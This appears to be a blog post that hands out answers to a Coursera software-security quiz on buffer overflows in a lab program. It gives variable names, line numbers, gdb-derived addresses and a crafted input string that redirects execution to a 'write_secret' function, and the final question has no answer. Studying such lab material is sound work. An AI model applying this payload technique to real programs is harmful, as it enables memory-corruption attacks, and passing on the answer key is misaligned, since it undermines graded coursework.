In this article i am gone to share Coursera Course Software Security Week 1 VM BOF Quiz Answer with you..

Software Security Week 1 VM BOF Quiz Answer

Also visit this link:  Software Security Week 1 Qualifying Quiz Answer

VM BOF Quiz Answer

Question 1) There is a stack-based overflow in the program.

What is the name of the stack-allocated variable that contains the overflowed buffer?

• Answer: wis

Question 2) Consider the buffer you just identified:

Running what line of code will overflow the buffer?

• Answer: 62

Question 3) There is another vulnerability, not dependent at all on the first, involving a non-stack allocated buffer that can be indexed outside its bounds. What variable contains this buffer?

• Answer: ptrs

Question 4) Consider the buffer you just identified: Running what line of code overflows the buffer?

• Answer: 101

Question 5) What is the address of buf?

• Answer: 0xbfff f130

Question 6) What is the address of ptrs?

• Answer: 0x0804 a0d4

Question 7) What is the address of write_secret?

• Answer: 0x0804 8534

Question 8) what is the address of p local to main?

• Answer: 0xbfff f534

Question 9) What input do you provide so that ptrs[s] reads/executes the contents of variable p instead of function in ptrs buffer? If ok, you will execute pat_on_back function. Enter your answer as an unsigned integer.

Answer:

• (p-ptrs)/4 is
• print /x (0xbffff534 – 0x804a0d4)/4
• 0x2dfed518 or 771675416

Question 10) What do you enter so that ptrs[s] reads (and then tries to execute) starting from the 65th byte in buf, ie. the location at buf[64]?

Enter your answer as an unsiged integer.

Answer:

• (gdb) print /x &buf[64]
• $6 = 0xbffff170
• (gdb) print /d  (int*)&buf[64]-(int *)&ptrs
• $14 = 771675175
• 771675175

Question 11) What do you replace xEExEExEExEE with to call write_secret?

 Answer:

• (gdb) print &write_secret
• $7 = (void (*)(void)) 0x8048534 <write_secret>
• 771675175x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx34x85x04x08

Question 12) Suppose you wanted to overflow the wis variable to perform a stack smashing attack. You could do this by entering 2 to call put_wisdom, and then enter enough bytes to overwrite the return address of that function, replacing it with the address of write_secret. How many bytes do you need to enter prior to the address of write_secret?